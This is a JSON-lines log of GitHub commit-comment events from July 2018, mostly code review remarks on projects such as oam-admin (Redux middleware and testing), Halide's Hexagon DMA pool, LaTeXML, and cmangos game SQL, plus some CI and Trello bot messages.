{"id":"7940247646","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648117,"position":5,"line":25,"path":"src/store/apiMiddleware.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:39:08Z","updated_at":"2018-07-09T21:39:08Z","author_association":"COLLABORATOR","body":"This was an error on my part about how to handle `fetch` responses that are `!ok`.  Please try and do some research on `fetch` and how its promises resolve with different status codes. "}},"created_at":"2018-07-09T21:39:08Z"}
{"id":"7940248208","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/synpipe"},"payload":{"comment":{"id":29648119,"position":4,"line":4,"path":"python/lsst/synpipe/makeFakeGalaxy.py","commit_id":"d0d147c3dace68e53e229f0a6b1148c34896f7c7","created_at":"2018-07-09T21:39:16Z","updated_at":"2018-07-09T21:39:16Z","author_association":"MEMBER","body":"@r-owen this is wrong. Also, the standard way recommended by astropy is to use:\r\n```python\r\nfrom astropy.io import fits\r\n```\r\nI'll fix this in DM-7886."}},"created_at":"2018-07-09T21:39:16Z"}
{"id":"7940248916","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648120,"position":64,"line":51,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:39:26Z","updated_at":"2018-07-09T21:39:26Z","author_association":"NONE","body":"what if _AllocDma() fails?"}},"created_at":"2018-07-09T21:39:26Z"}
{"id":"7940249666","type":"CommitCommentEvent","actor":{"login":"kartikmohta"},"repo":{"name":"sikang/motion_primitive_library"},"payload":{"comment":{"id":29648123,"position":null,"line":null,"path":null,"commit_id":"63ed42bebc53bbafcdc688e58b9767a9b404169b","created_at":"2018-07-09T21:39:37Z","updated_at":"2018-07-09T21:39:37Z","author_association":"COLLABORATOR","body":"Ah you disabled wercker build testing?"}},"created_at":"2018-07-09T21:39:37Z"}
{"id":"7940250293","type":"CommitCommentEvent","actor":{"login":"ChowderII"},"repo":{"name":"ChowderII/CKeyword"},"payload":{"comment":{"id":29648124,"position":null,"line":null,"path":null,"commit_id":"2370d56706f81e041a1f453c971aa45d633e80b5","created_at":"2018-07-09T21:39:47Z","updated_at":"2018-07-09T21:39:47Z","author_association":"OWNER","body":"Account is now properly setup on local machine."}},"created_at":"2018-07-09T21:39:47Z"}
{"id":"7940251464","type":"CommitCommentEvent","actor":{"login":"stevegolton"},"repo":{"name":"stevegolton/librouteros"},"payload":{"comment":{"id":29648129,"position":null,"line":null,"path":null,"commit_id":"d7c1de0a8b810853a48b9fc741d4c8492e597590","created_at":"2018-07-09T21:40:05Z","updated_at":"2018-07-09T21:40:05Z","author_association":"OWNER","body":"Hi Manio,\r\n\r\nI was thinking of upstreaming but never got a chance to test it in more than a few use cases (the project it was for fell through).\r\n\r\nThe work basically adds connect and receive timeouts. The latter fixes a bug where the lib would hang if the connection is dropped half way through a long request (such as a ping).\r\n\r\nI'd like to hold off merging until I can test it in more use cases including when being used from collectd."}},"created_at":"2018-07-09T21:40:05Z"}
{"id":"7940253530","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648135,"position":58,"line":45,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:40:34Z","updated_at":"2018-07-09T21:40:34Z","author_association":"NONE","body":"should it compare as <= or <?"}},"created_at":"2018-07-09T21:40:34Z"}
{"id":"7940254675","type":"CommitCommentEvent","actor":{"login":"rafal1137"},"repo":{"name":"etlegacy/etlegacy"},"payload":{"comment":{"id":29648138,"position":79,"line":79,"path":"src/org/libsdl/app/SDLActivity.java","commit_id":"7a337eb58574c19f6a153746d669b5e9b8c38e2d","created_at":"2018-07-09T21:40:49Z","updated_at":"2018-07-09T21:40:49Z","author_association":"MEMBER","body":"instead of main should be etl"}},"created_at":"2018-07-09T21:40:49Z"}
{"id":"7940254881","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648139,"position":34,"line":392,"path":"lib/LaTeXML/Common/Error.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:40:52Z","updated_at":"2018-07-09T21:40:52Z","author_association":"NONE","body":"What's the 'at' ?"}},"created_at":"2018-07-09T21:40:52Z"}
{"id":"7940257707","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648148,"position":91,"line":66,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:41:33Z","updated_at":"2018-07-09T21:41:33Z","author_association":"NONE","body":"again, no scoped mutex protection"}},"created_at":"2018-07-09T21:41:33Z"}
{"id":"7940258109","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29648149,"position":null,"line":null,"path":null,"commit_id":"e3a086de8a91a856eafda4719d226bf52e16b700","created_at":"2018-07-09T21:41:40Z","updated_at":"2018-07-09T21:41:40Z","author_association":"OWNER","body":"yes.\r\nDeleting multiple spaces is cancer OwO"}},"created_at":"2018-07-09T21:41:40Z"}
{"id":"7940258252","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648150,"position":47,"line":403,"path":"lib/LaTeXML/Common/Error.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:41:42Z","updated_at":"2018-07-09T21:41:42Z","author_association":"NONE","body":"Apparently bad style to explicitly return undef, except in rare circumstances; it's unnecessary here, since the caller will get undef anyway."}},"created_at":"2018-07-09T21:41:42Z"}
{"id":"7940260743","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29648160,"position":null,"line":null,"path":null,"commit_id":"580e52e52ecefed42628e410564860713e627823","created_at":"2018-07-09T21:42:19Z","updated_at":"2018-07-09T21:42:19Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-servn](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-servn).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-servn-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T21:42:19Z"}
{"id":"7940261736","type":"CommitCommentEvent","actor":{"login":"yychern"},"repo":{"name":"yychern/yes-helmet"},"payload":{"comment":{"id":29648163,"position":4,"line":4,"path":"README.md","commit_id":"1ee52d07ffef7e4c44f7c23d2a9d68dd9644e524","created_at":"2018-07-09T21:42:34Z","updated_at":"2018-07-09T21:42:34Z","author_association":"OWNER","body":"**members** : maryanne"}},"created_at":"2018-07-09T21:42:34Z"}
{"id":"7940263167","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648165,"position":3,"line":3,"path":"src/store/tokenMiddleware.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:42:53Z","updated_at":"2018-07-09T21:42:53Z","author_association":"COLLABORATOR","body":"This is a great simple example of how we should use middleware (conceptually simpler than the `apiMiddleware`).  Any thing in our application that has 'side effects' (ajax calls, dealing with local storage) needs to be extracted out of our application logic and I think the best place to deal with it is in middleware.  I like the explanations in this [article](https://medium.com/@jacobp100/you-arent-using-redux-middleware-enough-94ffe991e6)"}},"created_at":"2018-07-09T21:42:53Z"}
{"id":"7940265771","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648171,"position":12,"line":14,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:43:33Z","updated_at":"2018-07-09T21:43:33Z","author_association":"NONE","body":"its for dma, so hexagon_dma... is more appropriate naming"}},"created_at":"2018-07-09T21:43:33Z"}
{"id":"7940266059","type":"CommitCommentEvent","actor":{"login":"yychern"},"repo":{"name":"yychern/yes-helmet"},"payload":{"comment":{"id":29648172,"position":5,"line":5,"path":"README.md","commit_id":"1ee52d07ffef7e4c44f7c23d2a9d68dd9644e524","created_at":"2018-07-09T21:43:38Z","updated_at":"2018-07-09T21:43:38Z","author_association":"OWNER","body":"**new member** : maryanne"}},"created_at":"2018-07-09T21:43:38Z"}
{"id":"7940268617","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648177,"position":18,"line":17,"path":"test/test_actions.js","commit_id":"d0727caca805b89f88b4130a1e2db655b3b1c956","created_at":"2018-07-09T21:44:15Z","updated_at":"2018-07-09T21:44:15Z","author_association":"COLLABORATOR","body":"We don't need a store to test our actions.  We just need to check that given a set of parameters the action is returning an object of the appropriate shape."}},"created_at":"2018-07-09T21:44:15Z"}
{"id":"7940268796","type":"CommitCommentEvent","actor":{"login":"Saltgurka"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":29648178,"position":18,"line":2375,"path":"sql/scriptdev2/scriptdev2.sql","commit_id":"28e4abf66a62996a4cf00c9e54701f7f20cddf6c","created_at":"2018-07-09T21:44:17Z","updated_at":"2018-07-09T21:44:17Z","author_association":"CONTRIBUTOR","body":"@evil-at-wow is right. Here are updated texts from sniffs (Removed one \"the\" from 1015012 and added one missing \"the\" to 1015014):\r\n```sql\r\n(-1015012,'From the darkest night shall rise again the raven, shall take flight in the shadows, shall reveal the nature of its kind. Prepare yourself for its coming, for the faithful shall be elevated to take flight with the raven, the rest be forgotten to walk upon the ground, clipped wings and shame.', 0,4,0,0,'First Prophecy for Whispers of the Raven God'),\r\n(-1015013,'Steel your minds and guard your thoughts. The dark wings will cloud and consume the minds of the weak, a flock of thralls whose feet may never leave the ground.', 0,4,0,0,'Second Prophecy for Whispers of the Raven God'),\r\n(-1015014,'The old blood will flow once again with the coming of the raven, the return of the darkness in the skies. Scarlet night, and the rise of the old.', 0,4,0,0,'Third Prophecy for Whispers of the Raven God'),\r\n(-1015015,'The raven was struck down once for flying too high, unready. The eons have prepared the Dark Watcher for its ascent, to draw the dark cloak across the horizon.', 0,4,0,0,'Fourth Prophecy for Whispers of the Raven God'),\r\n```"}},"created_at":"2018-07-09T21:44:17Z"}
{"id":"7940270692","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648187,"position":29,"line":29,"path":"lib/LaTeXML/Common/Locator.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:44:45Z","updated_at":"2018-07-09T21:44:45Z","author_association":"NONE","body":"The (implied?) convention in LaTeXML is that toString gives you a short form while Stringify gives you a more explicit form. See for example a token a where toString would give you simply \"a\" where stringify would give you \"T_LETTER(a)\".  So they're not interchangeable.\r\n\r\nIn this case, we probably can partly recover the different styles of locators by having ToString use the short pathname and Stringify the long one."}},"created_at":"2018-07-09T21:44:45Z"}
{"id":"7940271611","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648189,"position":40,"line":27,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:44:59Z","updated_at":"2018-07-09T21:44:59Z","author_association":"NONE","body":"is this global then should be named properly, prefixed with hexagon_dma.."}},"created_at":"2018-07-09T21:44:59Z"}
{"id":"7940273431","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648194,"position":5,"line":169,"path":"lib/LaTeXML/Core.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:45:24Z","updated_at":"2018-07-09T21:45:24Z","author_association":"NONE","body":"short form was probably right here."}},"created_at":"2018-07-09T21:45:24Z"}
{"id":"7940274451","type":"CommitCommentEvent","actor":{"login":"LarryHudson322"},"repo":{"name":"LarryHudson322/ChrisR"},"payload":{"comment":{"id":29648197,"position":null,"line":null,"path":null,"commit_id":"360f67e0ed76e83175176fda605c061e63d39fab","created_at":"2018-07-09T21:45:39Z","updated_at":"2018-07-09T21:45:39Z","author_association":"OWNER","body":"got it"}},"created_at":"2018-07-09T21:45:39Z"}
{"id":"7940275343","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648199,"position":3,"line":2,"path":".babelrc","commit_id":"6e7c46d223db35c6cb5105e96401b5d7afa9544e","created_at":"2018-07-09T21:45:51Z","updated_at":"2018-07-09T21:45:51Z","author_association":"COLLABORATOR","body":"We don't need other babel presets, we can use one's provide by Create React App directly.  This actually took me a while to figure out as there is not much documentation surrounding this."}},"created_at":"2018-07-09T21:45:51Z"}
{"id":"7940275379","type":"CommitCommentEvent","actor":{"login":"wibeasley"},"repo":{"name":"schuelkem/REDCapR"},"payload":{"comment":{"id":29648202,"position":null,"line":null,"path":null,"commit_id":"a6fcc59141a89bb651fe4df387c192a4017eb53a","created_at":"2018-07-09T21:45:52Z","updated_at":"2018-07-09T21:45:52Z","author_association":"NONE","body":"@schuelkem, that's good to know.  I didn't.\r\n\r\nAre you happy with these changes?  If so, would you like to create a PR?\r\n\r\nBased on this and other advice you've given me oover the years, feel free to add your name to the list of contributors in the DESCRIPTION file in your eventual PR."}},"created_at":"2018-07-09T21:45:52Z"}
{"id":"7940277567","type":"CommitCommentEvent","actor":{"login":"Kryklyvenko"},"repo":{"name":"gderiyenko/boat24"},"payload":{"comment":{"id":29648205,"position":null,"line":null,"path":null,"commit_id":"6163b210a15c6b4014912fba70f2fe379f3048fc","created_at":"2018-07-09T21:46:24Z","updated_at":"2018-07-09T21:46:24Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [1. Language pages. We have to remove at the moment language pages because the text is in translate to English and Russia then we will add those pages.](https://trello.com/c/1ShVBIxb/1-1-language-pages-we-have-to-remove-at-the-moment-language-pages-because-the-text-is-in-translate-to-english-and-russia-then-we-w)"}},"created_at":"2018-07-09T21:46:24Z"}
{"id":"7940278473","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648208,"position":105,"line":82,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:46:38Z","updated_at":"2018-07-09T21:46:38Z","author_association":"NONE","body":"I don't get this function and why its needed"}},"created_at":"2018-07-09T21:46:38Z"}
{"id":"7940279045","type":"CommitCommentEvent","actor":{"login":"Kryklyvenko"},"repo":{"name":"gderiyenko/boat24"},"payload":{"comment":{"id":29648210,"position":null,"line":null,"path":null,"commit_id":"6163b210a15c6b4014912fba70f2fe379f3048fc","created_at":"2018-07-09T21:46:47Z","updated_at":"2018-07-09T21:46:47Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [1. Language pages. We have to remove at the moment language pages because the text is in translate to English and Russia then we will add those pages.](https://trello.com/c/1ShVBIxb/1-1-language-pages-we-have-to-remove-at-the-moment-language-pages-because-the-text-is-in-translate-to-english-and-russia-then-we-w)"}},"created_at":"2018-07-09T21:46:47Z"}
{"id":"7940279531","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29648212,"position":null,"line":null,"path":null,"commit_id":"907fb4b083cf168a68561d1ea08017c6d86a7443","created_at":"2018-07-09T21:46:54Z","updated_at":"2018-07-09T21:46:54Z","author_association":"NONE","body":"mostly clean code tips"}},"created_at":"2018-07-09T21:46:54Z"}
{"id":"7940280114","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29648215,"position":63,"line":63,"path":"src/main/java/movierent/model/dao/UserDao.java","commit_id":"907fb4b083cf168a68561d1ea08017c6d86a7443","created_at":"2018-07-09T21:47:04Z","updated_at":"2018-07-09T21:47:04Z","author_association":"NONE","body":"return counter != 0 ;"}},"created_at":"2018-07-09T21:47:04Z"}
{"id":"7940283453","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29648225,"position":25,"line":25,"path":"src/main/java/movierent/model/dao/UserDao.java","commit_id":"907fb4b083cf168a68561d1ea08017c6d86a7443","created_at":"2018-07-09T21:47:54Z","updated_at":"2018-07-09T21:47:54Z","author_association":"NONE","body":"extract to methods, here and in all other places with so many levels of nesting"}},"created_at":"2018-07-09T21:47:54Z"}
{"id":"7940283456","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648226,"position":5,"line":17,"path":"package.json","commit_id":"6e7c46d223db35c6cb5105e96401b5d7afa9544e","created_at":"2018-07-09T21:47:54Z","updated_at":"2018-07-09T21:47:54Z","author_association":"COLLABORATOR","body":"Calling `babel-register` here will run all our required dependencies through babel for transpiling.  This is why we need to use a root test file `./test/test.js` with `require` statements rather than `imports`.  This is a bit confusing so we should definitely discuss in more detail."}},"created_at":"2018-07-09T21:47:54Z"}
{"id":"7940284034","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648228,"position":5,"line":28,"path":"lib/LaTeXML/Core/Definition/CharDef.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:48:03Z","updated_at":"2018-07-09T21:48:03Z","author_association":"NONE","body":"probably don't need the -1 on any of these in the Definitions, right? The Locator should store the full pathname, and we'll decide later whether we want to print a long or short form."}},"created_at":"2018-07-09T21:48:03Z"}
{"id":"7940285716","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648236,"position":13,"line":37,"path":"package.json","commit_id":"6e7c46d223db35c6cb5105e96401b5d7afa9544e","created_at":"2018-07-09T21:48:28Z","updated_at":"2018-07-09T21:48:28Z","author_association":"COLLABORATOR","body":"Sinon allows you to directly resolve promises now so this library is no longer necessary."}},"created_at":"2018-07-09T21:48:28Z"}
{"id":"7940286455","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648237,"position":14,"line":157,"path":"lib/LaTeXML/Core/Definition/Conditional.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:48:39Z","updated_at":"2018-07-09T21:48:39Z","author_association":"NONE","body":"minor quibble: probably ToString better for the locator (the 2nd stringify)"}},"created_at":"2018-07-09T21:48:39Z"}
{"id":"7940288858","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648240,"position":3,"line":3,"path":"src/actions/actions.js","commit_id":"6e7c46d223db35c6cb5105e96401b5d7afa9544e","created_at":"2018-07-09T21:49:16Z","updated_at":"2018-07-09T21:49:16Z","author_association":"COLLABORATOR","body":"All actions should have a type and payload.  This type is always a string formatted this way."}},"created_at":"2018-07-09T21:49:16Z"}
{"id":"7940289285","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648243,"position":19,"line":144,"path":"lib/LaTeXML/Core/Gullet.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:49:22Z","updated_at":"2018-07-09T21:49:22Z","author_association":"NONE","body":"Ah, ok; that fixes my comment on previous commit! :>"}},"created_at":"2018-07-09T21:49:22Z"}
{"id":"7940290694","type":"CommitCommentEvent","actor":{"login":"Saltgurka"},"repo":{"name":"cmangos/wotlk-db"},"payload":{"comment":{"id":29648244,"position":5,"line":4,"path":"Updates/1589_black_morass_templates.sql","commit_id":"79151fd36b0980e5f1ea9a0170accecb3755993c","created_at":"2018-07-09T21:49:45Z","updated_at":"2018-07-09T21:49:45Z","author_association":"CONTRIBUTOR","body":"This change was intended. Medivh should not have Questgiver flag by default. It is set in the SD2 script after the event is finished"}},"created_at":"2018-07-09T21:49:45Z"}
{"id":"7940292465","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648247,"position":5,"line":314,"path":"lib/LaTeXML/Core/KeyVals.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:50:12Z","updated_at":"2018-07-09T21:50:12Z","author_association":"NONE","body":"Probably most messages will be fine with the short form?"}},"created_at":"2018-07-09T21:50:12Z"}
{"id":"7940293087","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29648250,"position":115,"line":92,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T21:50:20Z","updated_at":"2018-07-09T21:50:20Z","author_association":"NONE","body":"if calling _FinishFrame() here will be a problem."}},"created_at":"2018-07-09T21:50:20Z"}
{"id":"7940295448","type":"CommitCommentEvent","actor":{"login":"Roach"},"repo":{"name":"sfbrian/python-slack-events-api"},"payload":{"comment":{"id":29648262,"position":6,"line":8,"path":"example/example.py","commit_id":"32c2824a1dacf6c33d9144ff22463bc7242cc6eb","created_at":"2018-07-09T21:50:57Z","updated_at":"2018-07-09T21:50:57Z","author_association":"NONE","body":"Verification token won't still be required, though, right? 🤔 "}},"created_at":"2018-07-09T21:50:57Z"}
{"id":"7940296776","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648266,"position":5,"line":86,"path":"lib/LaTeXML/Core/Stomach.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:51:18Z","updated_at":"2018-07-09T21:51:18Z","author_association":"NONE","body":"Probably ToString better in both cases, here."}},"created_at":"2018-07-09T21:51:18Z"}
{"id":"7940297630","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648270,"position":5,"line":657,"path":"lib/LaTeXML/MathParser.pm","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:51:31Z","updated_at":"2018-07-09T21:51:31Z","author_association":"NONE","body":"ditto"}},"created_at":"2018-07-09T21:51:31Z"}
{"id":"7940298639","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648271,"position":26,"line":26,"path":"src/store/middleware.js","commit_id":"6e7c46d223db35c6cb5105e96401b5d7afa9544e","created_at":"2018-07-09T21:51:45Z","updated_at":"2018-07-09T21:51:45Z","author_association":"COLLABORATOR","body":"Please read the [documentation](https://redux.js.org/advanced/middleware) on middleware thoroughly.  Here it looks like there is some confusion of responsibilities between middleware and reducers."}},"created_at":"2018-07-09T21:51:45Z"}
{"id":"7940303572","type":"CommitCommentEvent","actor":{"login":"brucemiller"},"repo":{"name":"tkw1536/LaTeXML"},"payload":{"comment":{"id":29648280,"position":15,"line":361,"path":"lib/LaTeXML/Package/LaTeX.pool.ltxml","commit_id":"3fd21178f5806e284f28893f63b12a93c6ae826d","created_at":"2018-07-09T21:52:59Z","updated_at":"2018-07-09T21:52:59Z","author_association":"NONE","body":"ditto"}},"created_at":"2018-07-09T21:52:59Z"}
{"id":"7940303705","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29648281,"position":null,"line":null,"path":null,"commit_id":"afd25d5656bc996c6ff1c76be3c0722325051553","created_at":"2018-07-09T21:53:01Z","updated_at":"2018-07-09T21:53:01Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-servn](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-servn).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-servn-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T21:53:01Z"}
{"id":"7940303864","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648282,"position":77,"line":77,"path":"test/test_apiMiddleware.js","commit_id":"6e7c46d223db35c6cb5105e96401b5d7afa9544e","created_at":"2018-07-09T21:53:03Z","updated_at":"2018-07-09T21:53:03Z","author_association":"COLLABORATOR","body":"We have to wait for our stubbed api call promise to resolve here to use our assertions or they will just get skipped over."}},"created_at":"2018-07-09T21:53:03Z"}
{"id":"7940303925","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29648283,"position":null,"line":null,"path":null,"commit_id":"657b9bf38384d56c896f74beeab7ade2472e1960","created_at":"2018-07-09T21:53:04Z","updated_at":"2018-07-09T21:53:04Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2745 of 2933 tests passed, 88 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 221 tests had: EIO diffs.\n * 76 tests had: ESO big diffs.\n * 174 tests had: Table big diffs.\n * 166 tests had: ESO small diffs.\n * 101 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 39 tests had: Table small diffs.\n * 19 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 435\n * Failed: 188\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.59%25-yellow.png)</a> \n"}},"created_at":"2018-07-09T21:53:04Z"}
{"id":"7940305085","type":"CommitCommentEvent","actor":{"login":"spmghost"},"repo":{"name":"spmghost/test_rep"},"payload":{"comment":{"id":29648285,"position":null,"line":null,"path":null,"commit_id":"280fd9502d3f38825ade6c1b86b16ea221cc1e8b","created_at":"2018-07-09T21:53:23Z","updated_at":"2018-07-09T21:53:23Z","author_association":"OWNER","body":"ыва"}},"created_at":"2018-07-09T21:53:23Z"}
{"id":"7940305172","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29648286,"position":105,"line":105,"path":"test/test_apiMiddleware.js","commit_id":"6e7c46d223db35c6cb5105e96401b5d7afa9544e","created_at":"2018-07-09T21:53:24Z","updated_at":"2018-07-09T21:53:24Z","author_association":"COLLABORATOR","body":"The same goes for Promise rejections."}},"created_at":"2018-07-09T21:53:24Z"}
{"id":"7940306027","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29648287,"position":null,"line":null,"path":null,"commit_id":"a4c013eb8a392822b62c44f7ae5f5aadc73a2af0","created_at":"2018-07-09T21:53:37Z","updated_at":"2018-07-09T21:53:37Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-servn](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-servn).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-servn-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T21:53:37Z"}
{"id":"7940306113","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29648288,"position":null,"line":null,"path":null,"commit_id":"6c92d82e0b50266a9c01656920a7ad368cce24b1","created_at":"2018-07-09T21:53:38Z","updated_at":"2018-07-09T21:53:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [improve potential matches](https://trello.com/c/NpGEtW9X/23-improve-potential-matches)"}},"created_at":"2018-07-09T21:53:38Z"}
{"id":"7940306455","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29648289,"position":null,"line":null,"path":null,"commit_id":"772a3be142d18a04d59ee981d0e5ac0067e14d3e","created_at":"2018-07-09T21:53:43Z","updated_at":"2018-07-09T21:53:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [improve potential matches](https://trello.com/c/NpGEtW9X/23-improve-potential-matches)"}},"created_at":"2018-07-09T21:53:43Z"}
